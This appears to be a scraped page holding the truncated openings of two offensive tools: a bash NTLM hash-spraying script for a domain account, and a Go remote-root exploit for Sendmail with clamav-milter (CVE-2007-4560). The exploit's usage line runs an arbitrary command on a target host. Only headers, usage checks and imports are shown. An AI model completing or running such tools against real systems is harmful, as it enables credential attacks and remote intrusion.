This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/bash | |
# made by 0xjb, definitely not made for any ctf boxes | |
# Hash spraying when crackmapexec locks you out :( | |
# Is it good? no | |
# Did it work for me in a time of need? yes. | |
# Will it work for you? ¯\_(ツ)_/¯ | |
if [ "$#" -ne 2 ];then | |
echo "Usage: $0 <DOMAIN/User> <File of NTLM hashes 'hash:hash'>" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
// Sendmail w/ clamav-milter Remote Root Exploit | |
// 'CVE-2007-4560' | |
// coded by https://github.com/0xjbb :) | |
// go run exploit.go -h 192.168.109.42 -p 25 -c "ping -c 5 192.168.49.109" | |
import ( | |
"flag" | |
"log" | |
"net" | |
) |